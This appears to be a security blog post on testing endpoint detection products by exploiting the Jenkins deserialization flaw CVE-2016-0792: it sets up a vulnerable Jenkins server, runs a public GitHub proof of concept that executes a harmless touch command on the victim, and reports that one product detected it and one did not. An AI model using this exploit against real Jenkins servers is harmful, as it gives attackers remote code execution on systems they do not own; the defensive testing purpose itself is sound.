Exploit Jenkins Deserialization CVE-2016-0792 to Test Endpoint Detection Response

Steve Stonebraker
March 18, 2022

Testing Endpoint Detection Response Products

This is the first of many posts on how to test your Endpoint Detection Response product by using real world scenarios.

Products that are being tested

I am testing two products today:

Jenkins Exploit Information (CVE-2016-0792)

CVE-2016-0792 refers to a vulnerability in Jenkins (continuous integration tool) before versions 1.650 and LTS before 1.642.2 and allows remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.

Setting up your Environment

I will be covering a two machine scenario (victim and attacker). The victim machine will have the vulnerable version of Jenkins and the attacker machine will be running the exploit.

Victim Machine Setup

I chose to use an Amazon Web Services EC2 instance type t2.medium and Ubuntu 18.04 LTS (ami-0e472ba40eb589f49).

# Environment Setup for CVE-2016-0792
# 
# Multiple unspecified API endpoints in Jenkins 
# before 1.650 and LTS before 1.642.2 allow remote authenticated users to
# execute arbitrary code via serialized data in an XML file, 
# related to XStream and groovy.util.Expando.
# 
# O/S: Ubuntu 18.04
# Jenkins Version 1.609.3
# Known Exploit

# From Host (vulnerable machine)
#
# Prerequisite packages
# Download Java 7 JDK
curl -L -O -k https://files-cdn.liferay.com/mirrors/download.oracle.com/otn-pub/java/jdk/7u80-b15/jdk-7u80-linux-x64.rpm

# convert rpm to deb
apt-get install alien netcat developer-tools
sudo alien --scripts jdk-7u80-linux-x64.rpm

# install java 7 deb
dpkg -i jdk_1.7.080-1_amd64.deb

# Create Jenkins User
useradd jenkins
mkdir /home/jenkins
mkdir /opt/jenkins
chown -R jenkins:jenkins /home/jenkins
mkhomedir_helper jenkins

# Download and run Jenkins
cd /opt/jenkins
curl -L -k -O https://get.jenkins.io/war-stable/1.609.3/jenkins.war
java -jar jenkins.war

Attacker Machine

I am using MacOS Montery but any machine with Python3 will work

Download Exploit

The proof of concept code was found on github and was written by jpiechowka.

pip3 install requests
git clone https://github.com/jpiechowka/jenkins-cve-2016-0792
cd jenkins-cve-2016-0792

Use Exploit

You will need to replace <serverip> with the IP address of server you are trying to exploit

This example touches a file located at /tmp/file_write. The exploit proof of concept code has an issue with special characters so my example will not use them. The command below (touch) works fine and proves that we have code execution.

python3
from exploit import exploit
exploit('http://<serverip>:8080/', '/usr/bin/touch /tmp/file_write')
Successful exploit of CVE-2016-0792

Endpoint Detection

Configuration

Each product tested was configured with the highest possible settings for detection.

Response Testings Results

Prisma Cloud Host Defender

Did not detect or alert

Palo Alto XDR Linux Host Agent

Detected a “Suspicious Input Deserialization” event

Tags: , , , , , , ,